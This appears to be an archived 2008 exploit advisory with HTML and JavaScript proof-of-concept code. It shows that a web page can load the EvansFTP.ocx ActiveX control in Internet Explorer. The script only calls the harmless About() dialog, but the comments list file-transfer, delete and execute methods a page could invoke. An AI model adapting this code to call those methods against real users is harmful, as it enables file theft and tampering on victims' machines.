EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit
2008-05-09 00:00:00<HTML>
<!--
- EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit -
Author: t0pP8uZz
Homepage: h4ck-y0u.org / milw0rm.com
Description: ActiveX Remote Insecure
Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched
ActiveX: http://www.evansprogramming.com/evansftp.asp
The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.
InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions. the function being About()
all this will do is lauch a friendly, harmless dialog box, therefore being the perfect POC.
- EvansFTP.ocx -
About Displays the Evans FTP control About Dialog.
CancelTransfer Cancels in-progress file and data connection transfers.
Connect Opens a connection to the remote FTP server and starts a new session thread (logs in).
DeleteFile Deletes file(s) from a remote serversÂ’ directory.
Disconnect Disconnects an FTP session (logs out).
Execute Executes a remote FTP server command.
GetDirectory Returns a list of directory information from the remote server.
GetFile Transfers files from a remote FTP server to a local PC.
MakePath Creates a path on the remote server. MakePath can create multiple nested subdirectories with a single command.
MkDir Creates a folder on the remote FTP server.
Ping Tests if a remote server is responding.
PutFile Transfers files from the local PC to a remote FTP server.
RenameFile Renames a file on the remote FTP server.
RmDir Removes a directory from the remote FTP server.
WriteToConnection This method writes to an open data connection such as would be required to execute an ftp command like APPE.
Peace.
-->
<OBJECT ID="test" CLASSID="CLSID:DA3C77F4-8701-11D4-908B-00010268221D">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - EvansFTP (EvansFTP.ocx) Remote Insecure Methods Exploit - */
/* Javascript Code By t0pP8uZz */
test.About();
</script>
</HTML>
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.